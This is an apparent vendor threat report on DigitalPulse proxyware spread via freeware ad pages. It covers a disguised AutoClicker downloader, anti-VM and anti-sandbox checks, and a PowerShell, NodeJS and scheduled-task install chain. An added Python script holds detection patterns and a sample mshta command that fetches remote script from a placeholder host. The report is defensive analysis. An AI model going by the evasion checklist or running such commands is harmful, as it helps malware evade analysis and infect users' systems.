DigitalPulse Proxyware Being Distributed Through Ad Pages


AhnLab SEcurity intelligence Center (ASEC) has recently confirmed that proxyware is being installed through advertisement pages of freeware software sites. The proxyware that is ultimately installed is signed with a Netlink Connect certificate, but according to the AhnLab analysis, it is identical to the DigitalPulse proxyware that was abused in past Proxyjacking attack campaigns. While installing legitimate programs, users may install a disguised program called AutoClicker through ad pages and ultimately have their network bandwidth involuntarily hijacked by the installed proxyware.


1. Proxyjacking

Proxyjacking is the unauthorized installation of proxyware on infected systems, which lets threat actors share a portion of the system’s Internet bandwidth with external parties for financial gain. Proxyware is a program that shares part of the Internet bandwidth currently available on a system with others. Users who install such a program are usually paid a certain amount of cash in exchange for the bandwidth they provide. If a threat actor secretly installs proxyware on an infected system without the user’s consent, the system involuntarily has its bandwidth taken and the profit goes to the threat actor. This is similar to cryptojacking, except that in cryptojacking CoinMiners are installed instead of proxyware in order to mine cryptocurrency with the infected system’s resources.

Proxyjacking has been reported not only on the ASEC Blog but also by several other security companies. Proxyware strains abused in proxyjacking cases include IPRoyal, Peer2Profit [1], Traffmonetizer, Proxyrack, and PacketStream [2]. In 2023, LevelBlue reported a proxyjacking campaign that installs proxyware named DigitalPulse and is said to have infected at least 400,000 Windows systems [3].

In the recently identified proxyjacking attack, DigitalPulse is abused again; the only difference from past cases is that the proxyware is now signed under the name Netlink Connect, while its other characteristics are the same.


2. Distribution Through Ad Pages

In this case, the malware was installed via the homepage of a certain YouTube downloader program (freeware). After the user reaches the download page shown below, clicking on the webpage opens an advertisement page, which randomly redirects to various PUP, malware, or ad pages.

Figure 1. A freeware webpage used to distribute malware

The malware was downloaded from one of these download pages. The same webpage can also redirect to a page distributing LummaC2 (see Figure 2).

Figure 2. Pop-up pages distributing the malware

As mentioned in a previous ASEC Blog post, LummaC2 uses a phishing technique that places a malware download command in the clipboard and prompts the user to execute it [4]. Only CAPTCHA-related text is visible in the “Run” window, but as shown below, the pasted content is actually a command that uses mshta to download and execute malicious JavaScript from an external source. Whereas the malware was distributed as an email attachment in the previous case, it is now distributed through ad pages.

Figure 3. The command to install LummaC2 saved in the clipboard


3. Malware Analysis

If the user executes the file downloaded from the ad page described above without checking it, proxyware is ultimately installed on the system without the user’s knowledge.

Figure 4. Malware installation flowchart


3.1. Analysis Disruption Techniques

The initially distributed file installs AutoClicker, which is disguised as a GUI program providing an auto-click feature during installation (see Figure 5).

Figure 5. The initially distributed file and execution result

However, “AutoClicker.exe” is actually a downloader malware strain into which a routine for downloading proxyware has been inserted. AutoClicker encrypts the strings it uses and gives its functions names that look legitimate.

Figure 6. Encrypted strings and function names disguised as legitimate

Additionally, upon execution it first applies various anti-VM and anti-sandbox techniques to check whether the current environment is an analysis environment.

Analysis disruption technique: Target
Check the loaded DLLs: sbieDll.dll (Sandboxie), cmdvrt32.dll / cmdvrt64.dll (Comodo Antivirus), SxIn.dll (360 Total Security), cuckoomon.dll (Cuckoo Sandbox)
Check Sleep bypass
Check Wine: support status of the wine_get_unix_file_name() function in kernel32.dll
Check firmware: “Select * from Win32_ComputerSystem” / Manufacturer & Model / “microsoft corporation” & “VIRTUAL” (Hyper-V); “Select * from Win32_ComputerSystem” / Manufacturer / “vmware” (VMware)
Check files: “balloon.sys”, “netkvm.sys”, “vioinput”, “viofs.sys”, “vioser.sys” (KVM); “VBoxMouse.sys”, “VBoxGuest.sys”, “VBoxSF.sys”, “VBoxVideo.sys”, “vmmouse.sys”, “vboxogl.dll” (VirtualBox)
Check services: “vboxservice”, “VGAuthService”, “vmusrvc”, “qemu-ga”
Check port support status: “SELECT * FROM Win32_PortConnector”
Check named pipes: “\\.\pipe\cuckoo”, “\\.\HGFS”, “\\.\vmci”, “\\.\VBoxMiniRdrDN”, “\\.\VBoxGuest”, “\\.\pipe\VBoxMiniRdDN”, “\\.\VBoxTrayIPC”, “\\.\pipe\VBoxTrayIPC”
Check process names: “Procmon64”, “procexp64”, “x64dbg”, “x64dbg-unsigned”, “x32dbg”, “x32dbg-unsigned”
Check web browser history files: Chromium-based (0.5 MB or more), Mozilla Firefox (5.5 MB or more)

Table 1. Analysis disruption techniques

Among these analysis disruption techniques, the most notable is the check of the web browser’s history file: the malicious routine does not execute if the history file is below a certain size. For Chromium-based web browsers or Internet Explorer the size threshold is 0.5 MB, and for Mozilla Firefox it is 5.5 MB.

Figure 7. Checking the size of the web browser history file


3.2. Installing Proxyware

Once the checks above are completed, AutoClicker creates and executes a PowerShell script at the path “%TEMP%\t.ps1”. The script is responsible for installing NodeJS, downloading malicious JavaScript, and registering it in the Task Scheduler (see Figure 8).

Figure 8. A PowerShell script responsible for the downloader function

The task registered under the name “FastDiskCleanup” is responsible for executing the JavaScript malware downloaded using NodeJS.

Figure 9. A task registered under the name FastDiskCleanup

When the JavaScript is executed through NodeJS, it connects to a C&C server and sends basic system information, then executes additional commands based on the response. In this case the response is a PowerShell command that ultimately installs the proxyware.

Figure 10. Data structure transmitted to the C&C server

The PowerShell command downloads proxyware from GitHub to a path such as “C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Performance\NTService.exe” and registers it in the Task Scheduler under the name “Network Performance”.

Figure 11. A routine for installing proxyware

The proxyware ultimately installed is DigitalPulse, which also appeared in the past attack cases. The binary itself is practically the same, but the difference is that it is signed with a certificate named “Netlink Connect” this time.
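As an added example that is not part of the original post and not ASEC’s code, the following Python script runs simple detection rules for the chain described in Section 2 (the mshta command placed in the clipboard) and Section 3.2 (the t.ps1 downloader, the FastDiskCleanup and Network Performance tasks, and the NTService.exe drop path) over constructed, simplified telemetry records; the record fields and sample values are assumptions, not a real log schema.

```python
"""Added example (not ASEC's code): hunt over telemetry for the chain in the post.
Rules: the mshta "Run"-box lure (section 2), the %TEMP%\\t.ps1 downloader, the
NodeJS task "FastDiskCleanup" and the "Network Performance" task that runs
NTService.exe (section 3.2). Events below are constructed and simplified; the
field names are an assumption, not a real Sysmon or EDR schema."""
import re

KNOWN_TASK_NAMES = {"fastdiskcleanup", "network performance"}  # names from the post
PROXYWARE_PATH_RE = re.compile(
    r"\\systemprofile\\appdata\\local\\microsoft\\performance\\ntservice\.exe$", re.I)
TEMP_PS1_RE = re.compile(r"\\temp\\t\.ps1\b", re.I)
# mshta launched with a remote URL on its command line (the clipboard lure)
MSHTA_REMOTE_RE = re.compile(r'^"?(?:[^\s"]*\\)?mshta(?:\.exe)?"?\s+.*https?://', re.I)
# a scheduled task whose action runs node.exe on a .js file
NODE_TASK_RE = re.compile(r'node(?:\.exe)?"?\s+.*\.js\b', re.I)

def classify(event):
    """Return the names of the rules an event matches (empty list if none)."""
    hits = []
    if event.get("type") == "task_registered":
        if event.get("task_name", "").lower() in KNOWN_TASK_NAMES:
            hits.append("known-task-name")
        action = event.get("action", "")
        if PROXYWARE_PATH_RE.search(action):
            hits.append("proxyware-drop-path")
        if NODE_TASK_RE.search(action):
            hits.append("node-task")
    elif event.get("type") == "process_created":
        cmd = event.get("command_line", "")
        if MSHTA_REMOTE_RE.search(cmd):
            hits.append("mshta-remote-script")
        if TEMP_PS1_RE.search(cmd):
            hits.append("temp-ps1-downloader")
    return hits

def hunt(events):
    """Return (index, hits) for every event that matched at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]

# Constructed sample telemetry; the URL host and user paths are made up.
SAMPLE_EVENTS = [
    {"type": "process_created", "command_line": "mshta https://example.invalid/verify.hta"},
    {"type": "process_created", "command_line": r"powershell -ep bypass -File C:\Users\u\AppData\Local\Temp\t.ps1"},
    {"type": "task_registered", "task_name": "FastDiskCleanup",
     "action": r'"C:\Program Files\nodejs\node.exe" C:\Users\u\AppData\Local\Temp\x.js'},
    {"type": "task_registered", "task_name": "Network Performance",
     "action": r"C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Performance\NTService.exe"},
    {"type": "process_created", "command_line": "notepad.exe readme.txt"},
]
```

Running `hunt(SAMPLE_EVENTS)` flags the first four records and leaves the notepad record alone; the task-name rule is the cheapest check to add to an existing scheduled-task audit.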


4. Conclusion

DigitalPulse has been recently distributed through advertisement pages of freeware software sites. This proxyware is known to have infected at least 400,000 Windows systems through past proxyjacking campaigns, and in the recently confirmed case, the same proxyware was used although the certificate was different. Proxyware malware strains are similar to CoinMiners in that they gain profit by utilizing the system’s resources.

Users should be cautious about installing executable files from unofficial sources such as advertisements, pop-ups, or file-sharing sites. Additionally, on systems that are already infected, it is important to install V3 products to prevent further malware infections.


File Detection
Trojan/Win.Proxyware.R645077 (2024.12.02.03)
Trojan/Win.FSAutcik.R684719 (2024.12.13.03)
Dropper/Win.Proxyware.C5701827 (2024.12.02.03)
Downloader/Win.Proxyware.C5701829 (2024.12.02.03)
Dropper/Win.Proxyware.C5701832 (2024.12.02.03)
Dropper/Win.Proxyware.C5715070 (2025.01.08.03)
Downloader/PowerShell.Agent.SC207034 (2024.12.02.03)
Downloader/PowerShell.Agent.SC207005 (2024.12.02.02)
Downloader/JS.Agent.SC207031 (2024.12.02.03)
Downloader/PowerShell.Agent.SC222234 (2025.01.09.00)
Downloader/PowerShell.Agent.SC222235 (2025.01.09.00)
Downloader/PowerShell.Agent.SC222236 (2025.01.09.00)

Behavior Detection
Execution/MDP.Powershell.M2514

